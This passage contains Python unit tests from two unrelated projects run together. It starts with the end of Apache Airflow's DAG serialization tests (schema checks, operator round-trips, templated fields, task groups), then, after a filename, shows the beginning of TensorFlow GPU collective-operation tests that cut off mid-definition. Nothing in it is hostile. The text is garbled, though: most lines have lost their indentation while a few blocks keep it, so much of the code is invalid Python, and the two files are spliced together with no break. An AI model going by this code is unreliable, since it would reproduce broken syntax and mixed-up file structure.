    dags.update(make_user_defined_macro_filter_dag())
    if not dag_folder:
        patterns = [
            "airflow/example_dags",
            "airflow/providers/*/example_dags",
            "airflow/providers/*/*/example_dags",
        ]
    elif isinstance(dag_folder, (list, tuple)):
        patterns = list(dag_folder)
    else:
        patterns = [dag_folder]
    for pattern in patterns:
        for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
            dags.update(make_example_dags(directory))
    # Filter subdags as they are stored in same row in Serialized Dag table
    return {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
def serialize_subprocess(queue, dag_folder):
    """Serialize every collected DAG to JSON onto ``queue``; None terminates."""
    for dag in collect_dags(dag_folder).values():
        queue.put(SerializedDAG.to_json(dag))
    queue.put(None)  # sentinel: tells the consumer no more DAGs are coming
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group"
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
    """
    Test helper: create an object with arbitrary attributes in one statement.

    Example: ``ClassWithCustomAttributes(att1="a", template_fields=["att1"])``.
    Instances compare equal when their attribute dictionaries are equal, and
    their ``str``/``repr`` render the attribute dict (the serialization tests
    above assert against that exact string format).
    """

    def __init__(self, **kwargs):
        # Promote every keyword argument to an instance attribute.
        for key, value in kwargs.items():
            setattr(self, key, value)

    def __str__(self):
        return "{}({})".format(self.__class__.__name__, str(self.__dict__))

    def __repr__(self):
        return self.__str__()

    def __eq__(self, other):
        # Bug fix: comparing against an object without a __dict__ (e.g. an
        # int) previously raised AttributeError. Returning NotImplemented
        # lets Python fall back to its default (identity) comparison.
        if not hasattr(other, "__dict__"):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result
# Matrix of (templated_field, expected_field) pairs: basic values round-trip
# unchanged; arbitrary custom objects must come back as their string repr.
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
# NOTE(review): this row is a bare two-element list, which parameterized
# unpacks into the two positional args — equivalent to the tuple form above.
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
# Custom objects: the expected value is the object's str() output, because
# non-basic types are stringified during serialization (see docstring).
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields survive DAG serialization/deserialization.

Since we don't want to inflate arbitrary python objects (it poses an RCE/security
risk etc.) we check that non-"basic" objects are turned into strings after
deserializing, while basic containers/strings round-trip unchanged.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
# Round-trip the DAG through the serialized dict representation.
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
    """
    Additional properties are disabled on DAGs, so every key returned by
    DAG.get_serialized_fields must be listed in the JSON schema definition.
    """
    schema_properties: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
    # Keys injected manually during serialization are not serialized fields
    # of the DAG itself, so they are excluded from the comparison.
    manually_added: set = {"is_subdag", "tasks"}
    expected_fields: set = set(schema_properties) - manually_added
    self.assertEqual(set(DAG.get_serialized_fields()), expected_fields)
def test_operator_subclass_changing_base_defaults(self):
"""A subclass default that differs from BaseOperator's must survive serialization."""
# Guard: the rest of the test only proves something if the BaseOperator
# default really is True.
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
# The overridden default must not revert to BaseOperator's default after a
# serialize/deserialize round trip.
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
# Exhaustive snapshot of every instance attribute a bare BaseOperator
# creates; any attribute added to BaseOperator makes this comparison fail
# until the list (and the serialization schema) is updated.
self.assertEqual({'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
# Build a DAG with nested groups: task1 >> group234(task2, group34(task3,
# task4)) >> task5, exercising group-to-task and task-to-group edges.
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
# Serialized dict must satisfy the JSON schema.
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
# JSON round trip must reproduce the full DAG.
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
# Recursively compare the deserialized task-group tree against the
# original: interior nodes are TaskGroups (have .children), leaves are
# operators (AttributeError branch).
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
# Fake importer: top-level imports of 'kubernetes' (or its submodules) fail;
# everything else is delegated to the real import machinery.
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
collective_ops_gpu_test.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Collective Operations that require GPU."""
import os
import threading
import time
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import test
class CollectiveOpGPUTest(test.TestCase):
@classmethod
def setUpClass(cls):
"""Set group_size = num_gpus = 2 for all tests in this class."""
super(CollectiveOpGPUTest, cls).setUpClass()
# Group size is the number of devices in a group communicating collectively.
# This will be passed into the collective ops in the tests below.
cls._group_size = 2
cls._devices = ['/device:GPU:{}'.format(i) for i in range(2)]
# NCCL environment knobs for all tests in this class; NCCL_DEBUG=INFO
# makes NCCL log its setup, which helps diagnose collective failures.
os.environ['NCCL_DEBUG'] = 'INFO'
os.environ['NCCL_LAUNCH_MODE'] = 'PARALLEL'
def _setup_context(self, num_gpus=2):
    """Reset the eager context; skip the test unless enough GPUs are present."""
    context._reset_context()
    available = config.list_physical_devices('GPU')
    if len(available) < num_gpus:
        self.skipTest('Expected at least {} GPUs but found {} GPUs'.format(
            num_gpus, len(available)))
    context.ensure_initialized()
def testBasicNcclAllReduce(self):
"""All-reduce with 'Add'+'Div' yields the element-wise mean across devices."""
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
# Expected = element-wise mean of the two input tensors.
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_all_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div'))
return collectives
# Every participant must see the same reduced tensor.
for result in run_basic_all_reduce():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testInt32Error(self):
"""int32 all-reduce is unsupported on GPU and must raise InternalError."""
self._setup_context()
inputs = [[0, 1], [2, 3]]
group_key = 1
instance_key = 50
@def_function.function
def run_int32_error():
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i], dtype=dtypes.int32)
collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div')
with self.assertRaisesRegex(
errors.InternalError,
'does not support datatype DT_INT32 on DEVICE_GPU'):
run_int32_error()
def testFp16Reduce(self):
"""All-reduce in float16; looser tolerances for half precision."""
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 100
@def_function.function
def run_fp16_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i], dtype=dtypes.float16)
collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div'))
return collectives
for result in run_fp16_reduce():
# fp16 has ~3 decimal digits of precision, hence rtol/atol of 1e-3.
self.assertAllClose(result, expected, rtol=1e-3, atol=1e-3)
def testNcclHintAllReduce(self):
"""Same as the basic all-reduce but explicitly requesting NCCL."""
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_hint_all_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div',
communication_hint='nccl'))
return collectives
for result in run_nccl_hint_all_reduce():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testBasicNcclBroadcast(self):
"""Broadcast from device 0 to device 1; both must hold the source value."""
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_nccl_broadcast():
collectives = []
# Device 0 is the single sender; device 1 receives.
with ops.device(self._devices[0]):
t = constant_op.constant(tensor_value)
collectives.append(collective_ops.broadcast_send(
t, t.shape, t.dtype, self._group_size, group_key, instance_key))
with ops.device(self._devices[1]):
t = constant_op.constant(tensor_value)
collectives.append(collective_ops.broadcast_recv(
t.shape, t.dtype, self._group_size, group_key, instance_key))
return collectives
for result in run_basic_nccl_broadcast():
self.assertAllClose(result, tensor_value, rtol=1e-5, atol=1e-5)
def testNcclBroadcastDoubleRecv(self):
"""A broadcast where every participant receives has no source and fails."""
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_broadcast_double_recv():
for device in self._devices:
with ops.device(device):
t = constant_op.constant(tensor_value)
collective_ops.broadcast_recv(
t.shape, t.dtype, self._group_size, group_key, instance_key)
with self.assertRaisesRegex(errors.InternalError, 'found no source'):
run_nccl_broadcast_double_recv()
def testNcclBroadcastDoubleSend(self):
"""A broadcast where every participant sends has two sources and fails."""
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_broadcast_double_send():
for device in self._devices:
with ops.device(device):
t = constant_op.constant(tensor_value)
collective_ops.broadcast_send(
t, t.shape, t.dtype, self._group_size, group_key, instance_key)
with self.assertRaisesRegex(errors.InternalError, 'already has source'):
run_nccl_broadcast_double_send()
def testBasicNcclAllGather(self):
